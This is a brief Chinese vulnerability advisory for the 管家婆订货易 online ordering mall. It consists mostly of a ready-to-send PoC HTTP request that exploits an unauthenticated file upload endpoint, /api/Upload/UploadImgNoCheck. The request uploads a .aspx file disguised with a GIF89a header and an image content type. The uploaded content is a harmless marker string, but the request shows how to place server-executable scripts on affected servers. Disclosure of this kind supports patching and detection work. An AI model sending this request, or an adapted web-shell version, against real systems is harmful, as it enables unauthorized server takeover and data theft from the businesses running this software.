漏洞描述
管家婆订货易在线商城是一款专为传统企业打造的B2B订货平台,帮助企业构建专属订货平台,支持PC商城、微信商城、小程序商城、APP商城以及H5触屏版商城,形成五网合一的全方位覆盖。系统的 /api/Upload/UploadImgNoCheck 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞上传恶意文件,导致服务器被控制、敏感信息泄露或进一步的攻击。
管家婆商城 /api/Upload/UploadImgNoCheck 文件上传漏洞
PoC代码
POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 195
Content-Type: multipart/form-data; boundary=9463d22c3a07c1abba99eba6b392cc91
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
--9463d22c3a07c1abba99eba6b392cc91
Content-Disposition: form-data; name="Filedata"; filename="bpor8tnhz9.aspx"
Content-Type: image/jpeg
GIF89a
testxep
--9463d22c3a07c1abba99eba6b392cc91--